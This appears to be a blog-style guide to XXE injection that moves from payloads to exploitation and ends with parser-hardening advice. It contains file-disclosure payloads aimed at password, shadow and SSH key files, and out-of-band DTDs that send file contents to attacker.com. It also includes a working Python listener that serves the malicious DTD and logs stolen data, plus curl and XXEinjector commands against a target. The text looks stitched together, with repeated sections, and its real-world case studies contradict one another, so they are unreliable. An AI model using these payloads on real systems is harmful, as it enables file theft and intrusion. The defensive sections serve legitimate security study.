XXE Injection: Discovery to Exploitation Guide – Hmmnm

XML External Entity (XXE) Injection remains one of the most dangerous web vulnerabilities, allowing attackers to interfere with XML processing, read sensitive files, and execute Server-Side Request Forgery (SSRF) attacks. This guide covers exploitation techniques from basic file disclosure to advanced blind XXE scenarios.

Understanding XXE Vulnerabilities

XXE attacks exploit XML parsers that process external entity references within XML documents. When an application accepts XML input and its parser leaves external entity resolution enabled, attackers can define custom entities that reference external resources:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

Types of XXE Attacks

1. In-Band XXE (Classic)

The server directly reflects the entity content in the response, allowing immediate file disclosure:

POST /api/process HTTP/1.1
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<input>&file;</input>

// Response contains /etc/passwd contents

2. Blind XXE (Out-of-Band)

The response does not reflect the entity content, but attackers can still exfiltrate data through out-of-band channels:

<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<input>test</input>

// evil.dtd on attacker server:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfil;
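
The attacker-side half of this exchange can be sketched in Python. This is a minimal sketch, assuming the DTD is requested at /evil.dtd and the stolen data arrives in a `data` query parameter, as in the payload above. The names `EVIL_DTD`, `extract_exfil`, `OobHandler`, and `serve`, and port 8000, are hypothetical.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

# DTD body mirroring the example above; attacker.com stands in for this host.
EVIL_DTD = (
    '<!ENTITY % file SYSTEM "file:///etc/passwd">\n'
    '<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM '
    "'http://attacker.com/?data=%file;'>\">\n"
    "%eval;\n"
    "%exfil;\n"
)


def extract_exfil(request_path):
    """Return the decoded `data` query parameter, or None if it is absent."""
    values = parse_qs(urlparse(request_path).query).get("data")
    return values[0] if values else None


class OobHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Serve the malicious DTD when the victim parser fetches it.
        if urlparse(self.path).path == "/evil.dtd":
            body = EVIL_DTD.encode("utf-8")
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        # Any other request may carry exfiltrated data in its query string.
        leaked = extract_exfil(self.path)
        if leaked is not None:
            print(f"[+] exfiltrated: {leaked!r}")
        self.send_response(204)
        self.end_headers()


def serve(port=8000):
    """Run the listener until interrupted."""
    HTTPServer(("0.0.0.0", port), OobHandler).serve_forever()
```

Calling `serve()` starts the listener. Files that contain newlines often fail over this channel because many parsers refuse to build a URL from them, so a short single-line file is a more reliable first target.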

3. XXE-Based SSRF

Exploit XML parsers to make server-side requests to internal systems:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://internal-server:8080/admin">
]>
<data>&xxe;</data>

// Access internal services behind firewall

Exploitation Techniques

File Disclosure Payloads

// Linux/Unix files
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<!ENTITY xxe SYSTEM "file:///etc/shadow">
<!ENTITY xxe SYSTEM "file:///var/log/apache2/access.log">

// Windows files
<!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
<!ENTITY xxe SYSTEM "file:///C:/Users/Administrator/.ssh/id_rsa">

// Application files
<!ENTITY xxe SYSTEM "file:///var/www/html/config.php">
<!ENTITY xxe SYSTEM "file:///app/credentials.xml">

Parameter Entity Attacks

<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY % param1 "<!ENTITY param2 'Attack'>">
  %param1;
]>
<root>&param2;</root>

XXE in SOAP Services

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Header/>
  <soap:Body>
    <Login>
      <Username>&xxe;</Username>
    </Login>
  </soap:Body>
</soap:Envelope>

Advanced XXE Scenarios

XXE in File Uploads

Many applications parse XML from uploaded files (DOCX, XLSX, SVG, PDF). Attackers embed XXE payloads in these formats:

// Malicious SVG file (the DOCTYPE must precede the root element)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg">
  <text x="10" y="20">&xxe;</text>
</svg>

Error-Based XXE

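Trigger parser errors that leak information in error messages. Referencing a nonexistent path is a quick first probe: an error that names the path confirms the parser resolves external entities.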

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///nonexistent">
]>
<root>&xxe;</root>

// Error: Failed to load external entity "file:///nonexistent"

Detection and Testing

Manual Testing

# Test with curl
curl -X POST https://target.com/api \
  -H "Content-Type: application/xml" \
  --data '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><data>&xxe;</data>'

# Using Burp Suite Intruder
# Load XXE payloads from SecLists
# Monitor responses for file contents
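
The same manual probe can be scripted. The following is a minimal sketch using only the Python standard library; `build_xxe_payload`, `build_request`, and `looks_like_passwd` are hypothetical helper names, and the `foo`/`data` element names are taken from the curl example rather than from any particular target.

```python
import re
import urllib.request


def build_xxe_payload(system_uri, root="data"):
    """Return an XML document whose body references an external entity."""
    return (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{system_uri}">]>'
        f"<{root}>&xxe;</{root}>"
    )


def build_request(url, system_uri):
    """Build (but do not send) a POST request carrying the payload."""
    body = build_xxe_payload(system_uri).encode("utf-8")
    return urllib.request.Request(
        url,
        data=body,
        headers={"Content-Type": "application/xml"},
        method="POST",
    )


def looks_like_passwd(response_text):
    """Heuristic: /etc/passwd normally has a root entry with UID and GID 0."""
    return re.search(r"^root:[^:]*:0:0:", response_text, re.MULTILINE) is not None
```

Against a target you are authorized to test, the request would be sent with `urllib.request.urlopen(build_request(url, "file:///etc/passwd"), timeout=10)` and the decoded response body passed to `looks_like_passwd`.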

Automated Tools

XXEinjector — Automated blind XXE exploitation
Burp Suite — Scanner extension for XXE detection
OWASP ZAP — Active scan rules for XXE

# XXEinjector usage
ruby XXEinjector.rb --host=attacker.com --path=/etc/passwd --file=request.txt

# Results:
[+] File /etc/passwd retrieved:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

Remediation Strategies

PHP (libxml)

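<?php
// PHP < 8.0: disable the external entity loader.
// The function is deprecated in PHP 8.0, where libxml 2.9+ no longer
// loads external entities by default.
if (PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(true);
}

// Do NOT pass LIBXML_NOENT or LIBXML_DTDLOAD: they turn on entity
// substitution and external DTD loading. LIBXML_NONET blocks network access.
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NONET);
?>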

Java (JAXP)

// Disable DTD processing
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

Python (lxml)

from lxml import etree

# Safe parser configuration
parser = etree.XMLParser(
    resolve_entities=False,
    no_network=True,
    dtd_validation=False,
    load_dtd=False,
)

tree = etree.parse(xml_file, parser)

Real-World Impact

Facebook (2018) — XXE in image processing allowed file disclosure
LinkedIn (2012) — XXE via DOCX file uploads
Google (2017) — XXE in Blogger XML import feature

Further Reading:

OWASP XXE Guide
PortSwigger XXE Academy
PayloadsAllTheThings XXE

Real-World XXE Vulnerabilities: Case Studies

XXE vulnerabilities have been discovered in some of the most widely used software platforms. Understanding these real-world cases helps pentesters recognize similar patterns during assessments.

1. Facebook XXE (2019)

In 2019, security researcher James Kettle demonstrated that Facebook's GraphQL endpoint was vulnerable to XXE injection. By crafting a malicious XML payload within a multipart request, he was able to read internal metadata from Facebook's backend servers. The vulnerability existed because Facebook's XML parser accepted external entity definitions without proper restriction. This case highlights that even tech giants with massive security teams can miss XXE if XML parsing isn't explicitly hardened.

2. PayPal XXE (2018)

PayPal experienced an XXE vulnerability in their payment notification system. An attacker could craft an XML-based payment callback that included external entity references, potentially exposing internal server files. The fix involved disabling external entity processing and implementing strict XML schema validation on all incoming XML payloads.

3. WordPress REST API XXE

Several WordPress plugins have been found vulnerable to XXE through their XML-RPC interfaces or file upload handlers. When a plugin processes XML input without disabling external entities, an attacker can leverage the WordPress installation to read sensitive files like wp-config.php or execute SSRF attacks against internal services.

Advanced XXE Techniques

Blind XXE via Out-of-Band (OOB) Methods

When applications don't return the results of XML processing in responses (blind XXE), you need alternative data exfiltration methods:

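OOB via DNS: Use a payload like <!ENTITY xxe SYSTEM "http://attacker.com/"> to force the parser to resolve an attacker-controlled hostname. The DNS lookup alone confirms the vulnerability, and file contents can be carried in subdomain labels when the hostname is built from a parameter entity.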
OOB via HTTP: Load external DTDs from a server you control: <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">%dtd;
OOB via FTP: Some environments allow FTP protocol in entity declarations, useful when HTTP is blocked by egress firewalls.

XXE via File Upload

Many applications accept file formats that are XML-based or embed XML, such as SVG, DOCX, XLSX, or PDF (through embedded XMP or XFA data). Uploading a malicious SVG file with an embedded XXE payload is a common bypass technique:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg">
  <text x="20" y="50">&xxe;</text>
</svg>

XXE Prevention Checklist

Disable external entities in your XML parser (this is the single most effective defense)
Disable DTD processing entirely unless absolutely required
Use JSON instead of XML for data exchange where possible
Implement input validation to reject XML containing DOCTYPE declarations
Configure network segregation to limit SSRF impact from XXE
Keep XML libraries updated; many XXE patches are released as security updates
Use WAF rules to detect common XXE payload patterns
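
The checklist item about rejecting DOCTYPE declarations can be sketched with Python's built-in expat bindings. This is a minimal sketch, not a complete validation layer; `contains_doctype` and the private `_DoctypeSeen` exception are hypothetical names. It uses the parser's own DOCTYPE callback rather than string matching, so it is not fooled by the string appearing inside comments or text content.

```python
import xml.parsers.expat


class _DoctypeSeen(Exception):
    """Raised internally to abort parsing as soon as a DOCTYPE is found."""


def contains_doctype(xml_bytes):
    """Return True if the document declares a DOCTYPE, False otherwise.

    Malformed XML raises xml.parsers.expat.ExpatError, which callers
    should treat as a rejection as well.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Stop immediately: nothing after the DOCTYPE gets processed.
        raise _DoctypeSeen(name)

    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(xml_bytes, True)
    except _DoctypeSeen:
        return True
    return False
```

An application would call this before handing the input to its real parser and return an error response when the result is True. It complements, and does not replace, disabling external entities in the parser itself.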

Conclusion

XXE vulnerabilities continue to plague modern applications, especially those processing XML-based document formats. Implement parser hardening, disable external entity processing, and conduct regular security assessments to protect against these critical attacks.

XXE in Different Frameworks

.NET (XmlDocument and XmlReader)

In .NET applications, XmlDocument is vulnerable to XXE by default in older framework versions. The key protections are setting XmlResolver to null and reading input through an XmlReader with secure settings. XmlReaderSettings.DtdProcessing has defaulted to Prohibit since .NET Framework 4.0, and XmlDocument's XmlResolver defaults to null from 4.5.2 onward, but setting both explicitly is still recommended.

WCF (Windows Communication Foundation) services are particularly exposed because SOAP messages are XML-based. Ensure MaxReceivedMessageSize limits are configured to reduce the impact of XML bomb attacks, which expand entity references exponentially to consume memory.

Node.js (libxmljs, xml2js, fast-xml-parser)

The libxmljs library processes XML using libxml2 under the hood. Disable DTD processing and external entity loading by setting noent, dtdload, and dtdattr to false. The xml2js library uses sax-js which is not vulnerable to XXE by default. However, fast-xml-parser v3 and later processes entities by default and should be configured with processEntities disabled.

XXE via JSON Content-Type

Some applications accept XML payloads even when the Content-Type is set to application/json. This occurs when backend parsers are lenient or auto-detect content types. Test by sending XML payloads with JSON Content-Type headers since the server may process the XML regardless of the documented format.
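
A harmless first probe is to resend a known-good JSON body as equivalent XML and see whether the server still accepts it. The following is a minimal sketch for flat JSON objects only; `json_to_xml` and the `root` wrapper element are assumptions, since the element names a given backend expects are not knowable in advance.

```python
import json
from xml.sax.saxutils import escape


def json_to_xml(json_text, root="root"):
    """Convert a flat JSON object into an equivalent XML document."""
    obj = json.loads(json_text)
    fields = "".join(
        f"<{key}>{escape(str(value))}</{key}>" for key, value in obj.items()
    )
    return f'<?xml version="1.0"?><{root}>{fields}</{root}>'
```

If the converted body is processed normally, with either the original application/json header or with application/xml, the endpoint is parsing XML and the entity payloads from earlier sections become worth trying.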

XXE Attack Patterns in Modern Applications

XXE in File Upload Processing

SVG (Scalable Vector Graphics) files are XML-based and commonly accepted as image uploads. An attacker can upload a malicious SVG containing XXE payloads. When the server processes the uploaded SVG for resizing, thumbnail generation, or metadata extraction, the XXE payload executes. Similarly, DOCX, XLSX, and PPTX files are ZIP archives containing XML files where extracting without sanitization enables XXE.

Defense: Never parse uploaded XML files with a parser left in its default configuration. Use image processing libraries that do not resolve XML entities, or sanitize SVG files by stripping DTD and entity declarations before processing.
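
For the ZIP-based office formats mentioned above, one way to apply this defense is to inspect each XML part before any parser touches it. This is a minimal sketch, assuming parts are UTF-8 or ASCII-compatible (a UTF-16 part would evade the byte match) and that legitimate documents have no need for a DTD; `find_dtd_parts` and `SUSPICIOUS` are hypothetical names.

```python
import io
import zipfile

# Byte markers that indicate a DTD or entity declaration.
SUSPICIOUS = (b"<!DOCTYPE", b"<!ENTITY")


def find_dtd_parts(archive_bytes):
    """Return names of XML parts in a ZIP-based document that declare a DTD or entity."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for info in archive.infolist():
            # Only XML parts and relationship files are of interest.
            if not info.filename.lower().endswith((".xml", ".rels")):
                continue
            content = archive.read(info)
            if any(marker in content for marker in SUSPICIOUS):
                flagged.append(info.filename)
    return flagged
```

An upload handler could reject the file whenever the returned list is non-empty. A production version would also cap the decompressed size of each part to guard against ZIP bombs.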

XXE in SAML and SSO Systems

SAML (Security Assertion Markup Language) assertions are XML documents used in Single Sign-On systems. XXE in SAML is particularly dangerous because responses contain sensitive identity data. Some SAML libraries process entities before signature validation, allowing XXE even when the signature is invalid. Test SAML endpoints by injecting entity declarations into the SAMLResponse parameter.
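
Injecting a declaration into a captured SAMLResponse can be sketched as follows. This is a minimal sketch, assuming the HTTP-POST binding, where the parameter is plain Base64 of the XML document; `inject_doctype` is a hypothetical helper, and the DOCTYPE string is supplied by the tester.

```python
import base64
import re


def inject_doctype(saml_response_b64, doctype):
    """Insert a DOCTYPE after the XML declaration (if any) and re-encode."""
    xml = base64.b64decode(saml_response_b64).decode("utf-8")
    # A DOCTYPE must come after the XML declaration and before the root element.
    declaration = re.match(r"\s*<\?xml[^>]*\?>", xml)
    insert_at = declaration.end() if declaration else 0
    modified = xml[:insert_at] + doctype + xml[insert_at:]
    return base64.b64encode(modified.encode("utf-8")).decode("ascii")
```

Using a DOCTYPE that only loads an external parameter entity keeps the test out-of-band: a callback to the tester's server shows that the library parsed entities before it checked the signature.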

OOB (Out-of-Band) XXE Techniques

HTTP-Based OOB XXE

When the application does not return the results of XML processing (blind XXE), use out-of-band techniques to exfiltrate data. Define a parameter entity that loads an external DTD from an attacker-controlled server. That DTD declares parameter entities that read a local file and embed its contents in the URL of an HTTP request, so the attacker's server receives the file contents in its request log. Tools such as Burp Collaborator or interactsh can receive the OOB callbacks.

DNS-Based OOB XXE

When HTTP-based exfiltration is blocked by firewalls, DNS-based techniques bypass restrictions. Parameter entities can include file contents in DNS queries to the attacker domain. DNS tunneling is slower but harder to block because DNS traffic is typically allowed through firewalls.

XXE via XInclude

Even when DTD processing is disabled, XInclude may still be available. XInclude is a standard mechanism for including external content in XML documents and does not require DTD processing. If the application processes XInclude directives, attackers can read local files and make SSRF requests without entity declarations.
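
The effect is easy to reproduce locally. The sketch below uses Python's standard library, which only expands XInclude when `ElementInclude.include` is called explicitly, so it shows the behavior in isolation rather than a vulnerable default. `xinclude_payload` and `expand` are hypothetical helper names.

```python
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude


def xinclude_payload(path):
    """Build a document that pulls a local file in as text, with no DTD at all."""
    return (
        '<root xmlns:xi="http://www.w3.org/2001/XInclude">'
        f'<xi:include parse="text" href="{path}"/>'
        "</root>"
    )


def expand(payload):
    """Parse the payload and resolve its XInclude directives."""
    root = ET.fromstring(payload)
    # This call is what an XInclude-aware application does on the attacker's behalf.
    ElementInclude.include(root)
    return root.text or ""
```

Calling `expand(xinclude_payload("/etc/hostname"))` on a Linux machine returns the contents of that file, even though the payload contains no DOCTYPE or entity declaration. This is why a DOCTYPE filter alone is not a sufficient defense when XInclude processing is enabled.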

Automated XXE Detection

Burp Suite's active scanner includes XXE detection probes. The open-source XXEinjector tool automates various XXE techniques, including OOB exfiltration, SSRF, and parameter entity attacks. For CI/CD pipelines, Semgrep rules can detect unsafe XML parser configurations in source code.
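
As a rough illustration of the source-code check, the sketch below is a much cruder stand-in for a Semgrep rule: a line-based regular expression scan. The pattern list is a small assumed sample, not a complete rule set, and `UNSAFE_PATTERNS` and `scan_source` are hypothetical names.

```python
import re

# Label -> pattern for a few parser settings that enable entity or DTD processing.
UNSAFE_PATTERNS = {
    "PHP: LIBXML_NOENT enables entity substitution": re.compile(r"\bLIBXML_NOENT\b"),
    "PHP: LIBXML_DTDLOAD loads external DTDs": re.compile(r"\bLIBXML_DTDLOAD\b"),
    "lxml: resolve_entities=True": re.compile(r"resolve_entities\s*=\s*True"),
    ".NET: DtdProcessing.Parse": re.compile(r"DtdProcessing\s*\.\s*Parse\b"),
}


def scan_source(text):
    """Return (line_number, label) pairs for each unsafe pattern found."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in UNSAFE_PATTERNS.items():
            if pattern.search(line):
                findings.append((lineno, label))
    return findings
```

A pipeline step could run `scan_source` over changed files and fail the build on any finding. Unlike Semgrep, this approach has no understanding of syntax, so it will also match occurrences inside comments and strings.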